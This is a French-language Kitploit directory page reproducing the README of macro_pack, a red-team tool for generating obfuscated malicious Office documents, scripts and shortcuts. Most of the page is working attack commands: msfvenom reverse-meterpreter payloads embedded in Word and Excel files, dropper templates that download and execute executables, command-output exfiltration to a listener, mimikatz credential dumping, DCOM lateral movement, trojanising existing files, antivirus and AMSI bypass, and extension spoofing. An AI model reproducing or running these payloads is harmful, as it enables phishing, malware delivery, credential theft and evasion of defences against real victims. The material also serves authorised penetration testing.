Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
macro_pack — macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research. | Kitploit
Outils/GitHubGitHub/sevagas/macro_pack
Phishing ToolsExploit FrameworksPayload GenerationLateral MovementScripting & AutomationWeb Application ExploitationPenetration TestingSocial EngineeringRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Archived
GitHubsevagas/macro_pack

macro_pack

Voir le dépôtSite web
2.3k414il y a 2 ansVérifié par Kitploit

À propos

macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research.

Partager

Supported Python versions

macro_pack

Brève description


Attention : MacroPack n'est plus maintenu depuis 2021. Si vous êtes un professionnel et avez besoin d'outils offensifs pour l'accès initial, le contournement d'EDR, consultez https://www.balliskit.com


MacroPack Community est un outil utilisé pour automatiser l'obfuscation et la génération de formats rétro comme les documents MS Office ou les formats de type VBS. Il gère également divers formats de raccourcis. Cet outil peut être utilisé pour le red teaming, les tests d'intrusion, les démonstrations et les évaluations d'ingénierie sociale. MacroPack simplifiera le contournement des solutions antimalware et automatisera le processus depuis la source VBA jusqu'au document Office final ou autre type de payload. Il est très simple à utiliser :

  • Aucune configuration requise
  • Tout peut être fait avec une seule ligne de commande
  • Génération de la majorité des formats Office et des formats basés sur VBS
  • Payloads conçus pour des attaques avancées d'ingénierie sociale (email, clé USB, etc.)

L'outil est compatible avec les payloads générés par les outils de test d'intrusion populaires (Metasploit, Empire, ...). Il est également facile à combiner avec d'autres outils car il est possible de lire l'entrée depuis stdin et d'avoir une sortie silencieuse vers un autre outil. Cet outil est écrit en Python3 et fonctionne sur les plateformes Linux et Windows.

Note : La plateforme Windows avec les applications MS Office appropriées installées est requise pour la génération automatique de documents Office ou les fonctionnalités de cheval de Troie.

Démo 1

Obfuscation

L'outil utilisera diverses techniques d'obfuscation, toutes automatiques. Les fonctionnalités d'obfuscation sont compatibles avec tous les formats basés sur VBA et VBS qui peuvent être générés par MacroPack. L'obfuscation de base (option -o) inclut :

  • Renommer les fonctions
  • Renommer les variables
  • Supprimer les espaces
  • Supprimer les commentaires
  • Encoder les chaînes

Génération

MacroPack peut générer plusieurs types de documents MS Office et de formats de scripts. Le format sera automatiquement deviné en fonction de l'extension de fichier donnée. La génération de fichier se fait avec l'option --generate ou -G.

La version pro de MacroPack vous permet également de trojaniser des fichiers Office existants avec l'option --trojan ou -T.

Les formats MS Office supportés sont :

  • MS Word (.doc, .docm, .docx, .dotm)
  • MS Excel (.xls, .xlsm, .xslx, .xltm)
  • MS PowerPoint (.pptm, .potm)
  • MS Access (.accdb, .mdb)
  • MS Visio (.vsd, .vsdm)
  • MS Project (.mpp)

Les formats de script (txt) supportés sont :

  • Fichier texte VBA (.vba)
  • Fichier texte VBS (.vbs)
  • Windows Script File (.wsf)
  • Composants de script Windows scriptlets (.wsc, .sct)
  • Applications HTML (.hta)
  • Feuille de style XSLT (.xsl) (Oui, MS XSLT contient des scripts ^^)

Les formats de raccourcis/shell supportés sont :

  • Shell Link (.lnk)
  • Fichier de commande Explorateur (.scf)
  • Raccourci URL (.url)
  • Raccourci Groove (.glk)
  • Raccourci Paramètres (.settingcontent-ms)
  • Bibliothèque MS (.library-ms)
  • Informations de configuration (.inf)
  • Requête Web Excel (.iqy)
  • Projet Visual Studio (.csproj)
  • Ligne de commande (.cmd)
  • Lien symbolique (.slk) Version Pro uniquement
  • Aide HTML compressée (.chm) Version Pro uniquement

Notez que tous les formats de script et de raccourcis (sauf LNK) peuvent être générés sur la version Linux de MacroPack.

Utilisation éthique

Ce logiciel ne doit être utilisé que dans le cadre d'un engagement Red Team, d'un test d'intrusion, d'une simulation de phishing, d'une recherche en sécurité ou de toute autre forme d'évaluation de sécurité, avec l'autorisation légale et formelle des propriétaires du système. L'utilisation de ce logiciel pour attaquer des cibles sans consentement préalable est interdite et illégale. Il est de la responsabilité de l'utilisateur de se conformer à toutes les lois locales, étatiques, fédérales et nationales applicables. Nous déclinons toute responsabilité et ne sommes pas responsables des mauvais usages ou des dommages pouvant résulter de l'utilisation de ce logiciel.

À propos du mode pro...

Toutes les capacités et options de MacroPack ne sont pas disponibles dans MacroPack Community. Seule la version communautaire est disponible en ligne. Les fonctionnalités de la version pro « arment » véritablement le processus, c'est pourquoi leur accès est réservé aux professionnels. Le mode pro inclut des fonctionnalités telles que :

  • Contournement avancé des antimalware
  • Méthodes avancées d'injection de shellcode
  • Obfuscation de ligne de commande (Dosfuscation)
  • Contournement ASR et AMSI
  • Payloads VBA/VBS auto-déballants
  • Trojanisation de documents MS Office existants, fichiers d'aide et projets Visual Studio.
  • Intégration de payload leurre
  • Mouvement latéral via objets DCOM
  • Anti-rétro-ingénierie
  • Détection de sandbox
  • Support de formats supplémentaires tels que SYLK Excel 4.0 et fichiers d'aide compilés
  • Exécution de payload VBA avancée à partir de formats inhabituels
  • Modèles weaponisés et modèles supplémentaires (ex. EMPIRE, AUTOSHELLCODE)
  • Macros Excel 4.0 (XLM)
  • Et bien plus encore…

Quelques courtes vidéos de démonstration sont disponibles sur la chaîne Vimeo de BallisKit.

Important : Si vous souhaitez me contacter au sujet de MacroPack pro, utilisez mon adresse email emeric.nasi [at] sevagas.com. Je ne répondrai pas aux demandes anonymes concernant la version Pro, mais uniquement aux emails professionnels.

Exécution/Installation

Exécution du binaire Windows

  1. Obtenez la dernière version binaire depuis https://github.com/sevagas/macro_pack/releases/
  2. Téléchargez le binaire sur un PC avec Microsoft Office authentique installé.
  3. Ouvrez une console, placez-vous dans le répertoire du binaire et appelez le binaire, aussi simple que cela !```bash macro_pack.exe --help
root@kitploit:~
### Installation à partir des sources

Vous devez être sur une machine Windows pour construire MacroPack. Téléchargez et installez les dépendances :```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

L'outil est en python 3, alors commencez simplement avec votre installation python3. ex:```bash python3 macro_pack.py --help

or

python macro_pack.py --help # if python3 is default install

root@kitploit:~
Si vous voulez produire un exe autonome avec pyinstaller :  
* Installez pyinstaller : pip install pyinstaller
* Double-cliquez sur le script "build.bat".

Le fichier macro_pack.exe résultant se trouvera dans le répertoire **bin**.  


## Quelques exemples

### Communauté MacroPack

- Lister tous les formats de fichiers pris en charge```bash
macro_pack.exe --listformats
  • Lister tous les modèles disponibles```bash macro_pack.exe --listtemplates
root@kitploit:~
- Obfusque le fichier vba généré par msfvenom et place le résultat dans un nouveau fichier VBA.```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
  • Obfuscate le fichier VBA du stager Empire et générer un document MS Word :```bash macro_pack.exe -f empire.vba -o -G myDoc.docm
root@kitploit:~
- Générer un fichier MS Excel contenant un dropper obfusqué (télécharger payload.exe et le stocker sous dropped.exe)```bash
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 
  • Créer un document Word 97 contenant une charge utile VBA obfusquée de reverse meterpreter à l'intérieur d'un dossier partagé.```bash msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \REMOTE-PC\Share\meter.doc
root@kitploit:~
- Téléchargez et exécutez le stager Empire Launcher sans powershell.exe en utilisant le modèle DROPPER_PS```bash
# 1 Generate a file containing Empire lauchcher 
# 2 Make that file available on web server, ex with netcat:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
# 3 Use macro\_pack  to generate DROPPER_PS payload in Excel file
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
  • Exécuter calc.exe via une attaque Dynamic Data Exchange (DDE)```bash echo calc.exe | macro_pack.exe --dde -G calc.xslx
root@kitploit:~
<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/23fa8cfadc283a7abf02bde5fd10748c8c1d90bc3d977ee47024fe4e9d963824.png" alt="Démo DDE Excel"></p>


- Téléchargement et exécution d'un fichier via PowerShell à l'aide d'une attaque par Échange Dynamique de Données (DDE)```bash
# 1 Change the target file URL in resources\community\ps_dl_exec.cmd
# 2 Embed download execute cmd in document
macro_pack.exe --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.xslx
  • Exécuter la commande (notepad.exe) via le fichier de requête web Excel et DDE```bash

1 Create dde.dat file with next content

=cmd|' /c notepad.exe'!A1

2 Host dde.dat on webserver, ex. using macro_pack -l

3 Generate .iqy file

macro_pack.exe -G dde.iqy

root@kitploit:~
<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/26c6e5a38eb09ae914c743b473890cef40632ccbd25bce0a895f9f4770377f7d.png" alt="IQY demo"></p>


 - Générer un fichier VBS reverse TCP meterpreter obfusqué et l'exécuter ```batch
# 1 Generate obfuscated VBS based on meterpreter template as well as Metasploit resource file
echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs
# 2 On attacker machine Setup meterpreter listener
msfconsole -r meterpreter.rc
# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)
%windir%\SysWoW64\wscript meter.vbs

  • Générer un fichier HTA obfusqué qui exécute 'systeminfo' et renvoie le résultat vers un autre macro_pack en écoute sur 192.168.0.5```batch

1 Generate HTA file with REMOTE_CMD template

echo http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t REMOTE_CMD -o -G info.hta

2 On 192.168.0.5 open macro_pack as http listener

macro_pack.exe -l . --port=1234

3 run hta file with mshta

mshta.exe full/path/to/info.hta

root@kitploit:~
- Générer un raccourci URL qui exécute un fichier HTA local lorsque vous cliquez dessus```batch
 echo "file://C:\Users\username\Desktop\hello.hta" | macro_pack.exe -G yop.url
  • Générer un raccourci lnk qui exécute une commande cmd lançant calc.exe avec l'icône de calc.exe```batch echo '"c:\Windows\System32\cmd.exe /c calc.exe" "calc.exe"' | macro_pack.exe -G calc.lnk
root@kitploit:~
### Quelques exemples de MacroPack Pro

- Trojaniser le fichier partagé existant "report.xlsm" avec un dropper. Utiliser les fonctionnalités anti-AV et anti-rétro-ingénierie.```bash
echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER --bypass --stealth --antisandox --trojan "E:\accounting\report.xls"  
  • Générer un fichier Word contenant une charge utile VBA reverse meterpreter x64 auto-encodée (contournera la plupart des AV). Keep-alive est nécessaire car nous avons besoin que meterpreter reste actif avant de migrer.```bash msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --keep-alive -G out.docm
root@kitploit:~
- Transformer un fichier PowerPoint en cheval de Troie avec un reverse raw shellcode. La macro est obfusquée et modifiée pour contourner AMSI et la plupart des antivirus.```bash
echo beacon.bin | macro_pack.exe -o -t SHELLCODE --bypass -T  hotpics.pptm
  • Exécuter une macro sur un PC distant à l'aide de DCOM.```batch REM Step 1: Ensure you have enough rights net use \192.168.0.8\c$ /user:domain\username password

REM Step 2: Generate document, for example here, meterpreter reverse TCP Excel file echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsm REM Step 3: Copy the document somewhere on remote share copy meter.xlsm "\192.168.0.8\c$\users\username\meter.xlsm" REM Step 4: Execute! macro_pack.exe --dcom="\192.168.0.8\c$\users\username\meter.xlsm"

REM Step 2 to 4 in one step: echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\192.168.0.8\c$\users\username\meter.xlsm" --dcom="\192.168.0.8\c$\users\username\meter.xlsm"

root@kitploit:~
## Toutes les options de la version communautaire```
 Main payload generation options:
    -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the payload format based on extension.
        MacroPack supports most Ms Office and VB based payloads as well various kinds of shortcut files.
        Note: Office payload generation requires that MS Office application is installed on the machine
    --listformats View all file formats which can be generated by MacroPack
    -f, --input-file=INPUT_FILE_PATH A VBA macro file or file containing params for --template option or non VB formats
        If no input file is provided, input must be passed via stdin (using a pipe).
    -t, --template=TEMPLATE_NAME    Use code template already included in MacroPack
        MacroPack supports multiple predefined templates useful for social engineering, redteaming, and security bypass
    --listtemplates View all templates provided by MacroPack
    -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.
        Use with EMBED_EXE template to auto drop and exec the file or with EMBED_DLL to drop/load the embedded dll.


 Security bypass options:
    -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name)
    --obfuscate-names-charset=<CHARSET> Set a charset for obfuscated variables and functions
        Choose between: alpha, alphanum, complete or provide the list of char you want
    --obfuscate-names-minlen=<len> Set min length of obfuscated variables and functions (default 8)
    --obfuscate-names-maxlen=<len> Set max length of obfuscated variables and functions (default 20)
    --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates


 Other options:
    -q, --quiet Do not display anything on screen, just process request.
    -p, --print Display result file on stdout (will display VBA for Office formats)
        Combine this option with -q option to pipe result into another program
        ex: cat input_file.vba | macro_pack.exe -o -G obfuscated.vba -q -p | another_app
    -s, --start-function=START_FUNCTION   Entry point of macro file
        Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open  as the start function
    --icon Path of generated file icon. Default is %windir%\system32\imageres.dll,67
    --dde  Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE
        This option is only compatible with Excel formats.
    --run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations.
        This will trigger AutoOpen/Workbook_Open automatically.
        If no auto start function, use --start-function option to indicate which macro to run.
    --unicode-rtlo=SPOOF_EXTENSION Inject the unicode U+202E char (Right-To-Left Override) to spoof the file extension when view in explorers.
            Ex. To generate an hta file with spoofed jpg extension use options: -G something.hta --unicode-rtlo=jpg
            In this case, windows or linux explorers will show the file named as: somethingath.jpg
    -l, --listen=ROOT_PATH      Open an HTTP server from ROOT_PATH listening on default port 80.
    -w, --webdav-listen=ROOT_PATH Open a WebDAV server on default port 80, giving access to ROOT_PATH.
    --port=PORT Specify the listening port for HTTP and WebDAV servers.


    -h, --help   Displays help and exit
           

Utilisation des modèles

Les modèles peuvent être appelés en utilisant -t, --template=NOM_DU_MODÈLE combiné avec d'autres options.
Voici tous les modèles disponibles.

HELLO

Affiche simplement un message d'accueil et une sensibilisation à la macro.
Donnez à ce modèle le nom ou l'email de l'auteur :
-> Exemple : echo "@Author" | macro_pack.exe -t HELLO -G hello.pptm

CMD

Exécute une commande.
Donnez à ce modèle une ligne de commande
-> Exemple (ouvrir calc.exe depuis un fichier xslt) : echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xsl

REMOTE_CMD

Exécute une ligne de commande et envoie les résultats à un serveur HTTP distant.
Donnez à ce modèle l'URL du serveur et la commande à exécuter :

-> Exemple : ```echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t REMOTE_CMD -o -G cmd.doc``````bash

Catch result with any webserver or netcat

nc -l -p 7777

root@kitploit:~
### DROPPER
Télécharge et exécute un fichier.  
Donnez à ce modèle l'URL du fichier et le chemin de destination  
  -> Exemple :  ```echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xls```
   
        
### DROPPER_PS
Télécharge et exécute un script PowerShell en utilisant rundll32 (pour contourner le blocage de powershell.exe).  
Note : Ce payload téléchargera PowerShdll depuis Github.  
Donnez à ce modèle l'URL du script PowerShell que vous souhaitez exécuter :  
  -> Exemple :  ```echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc```
 
 
### DROPPER_DLL
Télécharge une DLL avec une autre extension et exécute-la en utilisant Office VBA.  
-> Exemple, charger une DLL meterpreter en utilisant Office :```batch
REM Generate meterpreter dll payload
msfvenom.bat  -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dll
REM Make it available on webserver, ex using netcat on port 6666
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat meter.dll; } | nc -l -p 6666 -q1
REM Create OFfice file which will download DLL and call it
REM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as .asd file
echo "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xls

METERPRETER

Modèle Meterpreter reverse TCP utilisant MacroMeter par Cn33liz.
Ce modèle est un stager Meterpreter C# construit par Cn33liz et intégré dans VBA via DotNetToJScript de James Forshaw.
Donnez à ce modèle l'IP et le PORT de l'écoute mfsconsole :
-> Exemple : echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docm

Ce modèle génère également un fichier meterpreter.rc pour créer le handler Metasploit
-> Exemple : msfconsole -r meterpreter.rc

EMBED_EXE

Déposer et exécuter un fichier intégré.
Combiné avec l'option --embed, il dépose et exécute le fichier intégré avec un nom aléatoire dans le dossier TEMP.
-> Exemple : macro_pack.exe -t EMBED_EXE --embed=c:\windows\system32\calc.exe -o -G my_calc.vbs

EMBED_DLL

Combiné avec l'option --embed, il dépose et appelle une fonction dans la DLL donnée.
Donnez à ce modèle le nom et les paramètres de la fonction à appeler dans la DLL
-> Exemple1 : echo "main" | macro_pack.exe -t EMBED_DLL --embed=cmd.dll -o -G cmd.doc
-> Exemple2 : echo "main log privilege::debug sekurlsa::logonpasswords exit" | macro_pack.exe -t EMBED_DLL --embed=mimikatz.dll -o -G mimidropper.hta

Efficacité

Les différentes fonctionnalités ont été testées contre des solutions antimalware installées localement ainsi que des services en ligne. J'ai effectué plusieurs tests avec plusieurs types de payloads et fonctionnalités de MacroPack. La majorité de l'analyse statique des antivirus sera contournée par la simple option "obfuscate". Cependant, comme la plupart des outils gratuits, les payloads sont généralement détectées par l'analyse comportementale telle que l'AMSI. Les fonctionnalités disponibles en mode pro de MacroPack permettent généralement un contournement complet de l'AV, y compris de l'AMSI.

Avertissement : Ne soumettez pas vos échantillons à des scanners en ligne (ex VirusTotal), c'est le meilleur moyen de briser votre macro furtive. Je vous suggère également de ne pas les soumettre à des sites non déclaratifs comme NoDistribute. Vous ne pouvez pas être sûr de ce que ces sites feront des données que vous soumettez. Si vous rencontrez un problème de détection AV avec macro_pack, vous pouvez nous écrire pour obtenir des conseils ou soumettre un ticket ou une pull request.

Ressources pertinentes

Articles de blog sur MacroPack Pro :

  • https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads
  • https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro (payloads Excel 4.0 XLM dans MacroPack Pro)
  • https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection (injection XLM dans MacroPack Pro)

Articles de blog sur le hacking avec MS Office, VBS, et autres trucs rétro de sécurité :

  • https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction
  • https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
  • http://blog.sevagas.com/?My-VBA-Bot (écrire un RAT VBA complet, inclut le contournement de la protection VBOM)
  • http://blog.sevagas.com/?Hacking-around-HTA-files (exécuter du code hta dans des fichiers non-hta et polyglots hta)
  • https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (À propos des attaques Dynamic Data Exchange)
  • https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

Autres liens utiles :

  • https://github.com/p3nt4/PowerShdll (Exécuter PowerShell avec seulement des dll)
  • https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Exécuter un script powershell avec l'implémentation VBA de PowerShdll)
  • https://github.com/EmpireProject/Empire
  • https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
  • https://github.com/Cn33liz/MacroMeter
  • https://github.com/khr0x40sh/MacroShop
  • https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
  • https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard

Contact

N'hésitez pas à m'envoyer un message sur mon compte Twitter @EmericNasi
Emails :

  • emeric.nasi[ at ]sevagas.com
  • ena.sevagas[ at ]protonmail.com

Important : Si vous souhaitez me contacter à propos de MacroPack pro, utilisez mon adresse email sevagas.com. Veuillez également noter que je ne répondrai pas aux demandes anonymes concernant la version Pro, uniquement aux emails professionnels.

Licence et crédits

La licence Apache 2.0

Copyright 2017,2018,2019,2020,2021,2022 Emeric “Sio” Nasi (blog.sevagas.com)

Télécharger l’outil